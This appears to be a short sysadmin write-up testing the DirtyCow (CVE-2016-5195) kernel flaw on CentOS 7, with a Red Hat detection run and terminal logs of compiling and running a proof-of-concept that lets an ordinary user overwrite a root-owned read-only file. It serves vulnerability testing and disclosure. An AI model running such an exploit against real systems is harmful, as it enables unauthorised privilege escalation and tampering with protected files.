DirtyCow – CVE-2016-5195

DirtyCow Local Privilege Escalation

Test with the Red Hat detection script:

[root@condor ~]# bash rh_cve_20165195.sh
Your kernel is 3.10.0-327.36.1.el7.x86_64 which IS vulnerable.
Red Hat recommends that you update your kernel. Alternatively, you can apply partial
mitigation described at https://access.redhat.com/security/vulnerabilities/2706661 .
[root@condor ~]#

Exploit code

Sample test on CentOS

[root@condor ~]# cat /etc/redhat-release
CentOS Linux release 7.2.1511 (Core)

As root:

1 – create a file:

[root@condor ~]# echo this is not a test > /home/local/AD/lini/foo
[root@condor ~]# ls -lah /home/local/AD/lini/foo
-rw-r--r-- 1 root root 19 21 ott 09.41 /home/local/AD/lini/foo

2 – change the permissions

[root@condor ~]# chmod 0404 /home/local/AD/lini/foo
[root@condor ~]# ls -lah /home/local/AD/lini/foo

As user:

1 – compile the PoC code

[AD\lini@condor ~]$ gcc -lpthread dirtycow_poc.c -o dirtycow

2 – verify the file permissions and try to write to the file

[AD\lini@condor ~]$ ls -lah foo
-r-----r-- 1 root root 19 21 ott 09.41 foo
[AD\lini@condor ~]$ echo pippo > foo
bash: foo: Permesso negato

3 – launch the PoC

[AD\lini@condor ~]$ ./dirtycow foo pippo
mmap 985f0000

madvise 0

procselfmem 500000000

[AD\lini@condor ~]$ cat foo
pippois not a test

Updated PoCs table here
